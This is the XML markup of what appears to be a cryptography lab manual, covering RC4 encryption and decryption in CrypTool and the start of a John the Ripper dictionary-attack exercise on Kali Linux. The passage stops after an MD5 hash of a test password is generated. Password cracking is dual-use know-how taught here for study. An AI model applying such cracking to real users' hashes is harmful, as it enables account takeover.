        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="205"/>
        <w:ind w:left="1167" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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encryption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decryption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RC4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algorithm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4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CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,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and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7105E" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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cracking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dictionary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John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Ripper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Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B9F3F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37483644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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68569848" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="205" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="173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Encryption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Decryption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RC4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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1) Step 1: Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CF5B2" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Download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install</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4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CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(Classic)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Windows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system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A8AF3" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Launch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7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CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E816B97" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="242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Create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New</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66093521" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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File → </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51997A" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E79A0AE" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>blank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document </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16185C" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="243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Enter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Plaintext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Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B189DE" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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Type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plaintext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document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02DAA5" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="242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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478AD358" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DAA3EC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5F340D35" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr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Encryption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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RC4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB84C4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0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Select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plaintext using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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mouse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68513D39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From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menu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bar,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click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6B4D0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Encrypt/Decrypt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Symmetric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RC4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→ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097341C5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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1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dialog box </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AECA81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Enter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Secret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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B8996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secretkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12FA075A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In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Bits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field,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enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8C297" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1D37B" w14:textId="77777777" w:rsidR="00700285" w:rsidRPr="00700285" w:rsidRDefault="00377F23" w:rsidP="00700285">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538902DD" w14:textId="74264641" w:rsidR="00700285" w:rsidRPr="00700285" w:rsidRDefault="00377F23" w:rsidP="00700285">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observe</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>plaintext</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>converted</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ciphertext</w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00700285">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 5: Decryption using RC4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A4788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0" w:line="240" w:lineRule="exact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Select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generated </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ciphertext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06671B27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From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menu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bar,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click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C896C7A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Encrypt/Decrypt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Symmetric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RC4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→ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F135ED5" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00700285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Enter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same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secret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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D636342" w14:textId="77777777" w:rsidR="00700285" w:rsidRPr="00700285" w:rsidRDefault="00700285" w:rsidP="00700285">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2529FB68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lastRenderedPageBreak/>
        <w:t>secretkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="569E7928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Enter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same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number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of </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189ACC19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0"/>
        <w:ind w:left="1167" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594A963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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332E753" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="24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Observe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that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original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plaintext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restored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10DE8F" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2136D07E" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="6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Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9429F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line="276" w:lineRule="auto"/>
        <w:ind w:right="1062"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Verify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that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decrypted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matches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original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plaintext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entered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before </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADA739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387ADC04" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr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Observations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(Part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–</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5759E5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RC4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uses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same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secret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encryption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decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E209B3B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before="242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decrypted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output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identical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original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plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EFF5A2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before="241"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This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that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RC4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symmetric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encryption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algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF2178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64A3B55C" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="170"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7771702C" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Cracking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John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Ripper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(Dictionary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Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E93B73" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9A812B" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155A3906" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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 Boot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into Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A4BF5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before="201"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Start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 boot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into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Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50D95C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before="243"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log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in using valid </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF72B7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67D0BD94" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="168"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E05D492" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Open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Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8BDE7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Open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Terminal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from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applications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menu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A3117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737BAB5B" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="1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Create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Test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Password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Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09385B3D" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="1888" w:right="1730" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Generate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MD5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hash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sample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following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command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69BB97" w14:textId="29D270A6" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="1888" w:right="1730" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo -n password123 | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E81AB" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note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down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generated hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD179F3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024050CC" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78685CB3" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23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Store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Hash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 a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File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B940E1" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Create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 file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store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hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAE044" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
